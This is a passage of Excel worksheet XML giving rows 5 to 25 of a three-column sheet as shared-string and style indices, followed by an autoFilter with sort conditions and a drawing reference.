        <v>1368</v>
      </c>
      <c r="C5" s="77" t="s">
        <v>1362</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="72" t="s">
        <v>1369</v>
      </c>
      <c r="B6" s="19" t="s">
        <v>1370</v>
      </c>
      <c r="C6" s="77" t="s">
        <v>1362</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="72" t="s">
        <v>1371</v>
      </c>
      <c r="B7" s="20" t="s">
        <v>1372</v>
      </c>
      <c r="C7" s="77" t="s">
        <v>1362</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="72" t="s">
        <v>1373</v>
      </c>
      <c r="B8" s="19" t="s">
        <v>1374</v>
      </c>
      <c r="C8" s="77" t="s">
        <v>1362</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="72" t="s">
        <v>1375</v>
      </c>
      <c r="B9" s="20" t="s">
        <v>1376</v>
      </c>
      <c r="C9" s="77" t="s">
        <v>1362</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="72" t="s">
        <v>1377</v>
      </c>
      <c r="B10" s="19" t="s">
        <v>1378</v>
      </c>
      <c r="C10" s="78" t="s">
        <v>1379</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="72" t="s">
        <v>1380</v>
      </c>
      <c r="B11" s="20" t="s">
        <v>1381</v>
      </c>
      <c r="C11" s="78" t="s">
        <v>1379</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="72" t="s">
        <v>1382</v>
      </c>
      <c r="B12" s="19" t="s">
        <v>1383</v>
      </c>
      <c r="C12" s="78" t="s">
        <v>1379</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="72" t="s">
        <v>1384</v>
      </c>
      <c r="B13" s="20" t="s">
        <v>1385</v>
      </c>
      <c r="C13" s="78" t="s">
        <v>1379</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="72" t="s">
        <v>1386</v>
      </c>
      <c r="B14" s="19" t="s">
        <v>1387</v>
      </c>
      <c r="C14" s="78" t="s">
        <v>1379</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="72" t="s">
        <v>1388</v>
      </c>
      <c r="B15" s="20" t="s">
        <v>1389</v>
      </c>
      <c r="C15" s="78" t="s">
        <v>1379</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="72" t="s">
        <v>1390</v>
      </c>
      <c r="B16" s="19" t="s">
        <v>1391</v>
      </c>
      <c r="C16" s="78" t="s">
        <v>1379</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="72" t="s">
        <v>1392</v>
      </c>
      <c r="B17" s="20" t="s">
        <v>1393</v>
      </c>
      <c r="C17" s="78" t="s">
        <v>1379</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="72" t="s">
        <v>1394</v>
      </c>
      <c r="B18" s="19" t="s">
        <v>1395</v>
      </c>
      <c r="C18" s="79" t="s">
        <v>1396</v>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="72" t="s">
        <v>1397</v>
      </c>
      <c r="B19" s="20" t="s">
        <v>1398</v>
      </c>
      <c r="C19" s="79" t="s">
        <v>1396</v>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="72" t="s">
        <v>1399</v>
      </c>
      <c r="B20" s="19" t="s">
        <v>1400</v>
      </c>
      <c r="C20" s="79" t="s">
        <v>1396</v>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="72" t="s">
        <v>1401</v>
      </c>
      <c r="B21" s="20" t="s">
        <v>1402</v>
      </c>
      <c r="C21" s="79" t="s">
        <v>1396</v>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="72" t="s">
        <v>1403</v>
      </c>
      <c r="B22" s="19" t="s">
        <v>1404</v>
      </c>
      <c r="C22" s="79" t="s">
        <v>1396</v>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="72" t="s">
        <v>1405</v>
      </c>
      <c r="B23" s="20" t="s">
        <v>1406</v>
      </c>
      <c r="C23" s="79" t="s">
        <v>1396</v>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="72" t="s">
        <v>1407</v>
      </c>
      <c r="B24" s="19" t="s">
        <v>1408</v>
      </c>
      <c r="C24" s="79" t="s">
        <v>1396</v>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="72" t="s">
        <v>1409</v>
      </c>
      <c r="B25" s="20" t="s">
        <v>1410</v>
      </c>
      <c r="C25" s="79" t="s">
        <v>1396</v>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="$A$1:$C$25">
    <sortState ref="A1:C25">
      <sortCondition ref="C1:C25"/>
      <sortCondition ref="A1:A25"/>
    </sortState>
  </autoFilter>
  <drawing r:id="rId1"/>
</worksheet>
</file>